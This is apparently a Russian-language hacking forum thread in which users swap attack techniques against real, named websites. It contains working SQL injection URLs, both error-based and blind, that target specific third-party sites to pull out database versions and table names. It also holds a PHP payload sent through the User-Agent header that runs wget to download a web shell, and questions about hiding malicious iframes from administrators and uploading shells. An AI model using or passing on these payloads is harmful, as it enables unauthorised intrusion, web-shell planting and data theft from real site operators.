Harvard, читай, все идеально расписано http://forum.antichat.ru/thread43966.html daniel_1024, да ,попробуй замени : "User-Agent", своим шеллом. Для заливки полноценного шелла, отправь такой запрос PHP: <?php system('wget http://site.ru/shell.php'); ?>
http://www.znania.ru/dbxhigh.asp?id=1' как узнать версию? http://www.znania.ru/dbxhigh.asp?id=1+or+1=version@@-- не работает. там фильтрация какая то или что?
во первых: http://www.znania.ru/dbxhigh.asp?id=1+or+1=@@version а во вторых http://www.znania.ru/dbxhigh.asp?id=1+and+ascii(substring(@@version),1,1)=53
После установки айфрейма и загрузки страницы с ним, браузер будет писать что-то вроде Sending request to iframelink.com. Внимательный админ это сразу заметит. Есть способы скрытия обращения к странице, указанной в айфрейме?
Code: http://www.znania.ru/dbxhigh.asp?id=1+AND+ascii%28substring%28%28select+table_name+from+information_schema.tables%29,1,1%29%29%3E117 хмм.. Could not find file 'c:\windows\system32\inetsrv\information_schema.mdb'.
Code: http://www.ceylinco-insurance.com/products.php?id=(select*from(select+name_const(version(),1),name_const(version(),1))a)
LokbatanLi,юзай поиск... Читай : http://forum.antichat.ru/thread43966.html https://forum.antichat.ru/thread104591.html
Pashkela Каким способом ты раскрутил эту инъекцию? Как это делать без подбора полей и т.д.? Мб есть линк на статью? В этой скуле если искать количество полей через group by, то это 12, а если union select, то при вводе 12 появляется ошибка. Почему?
ось линукс, имеется возможность выполнять системные команды. как закачать полноценный шелл? get и wget не работают...
тренируюсь с блинд скулями в собсвенном скрипте. 1. нет нормальных статей по блинду 2. есть табла user с полем login и password вот пример инжекта моего http://localhost/index.php?id=1&act=news' and substring(version(),1,1)29=5+--+ помогите плиз состваить запроc на проверку 1-ого симвала логина или пасса. и дайти плиз ссылки на хорошие статьи
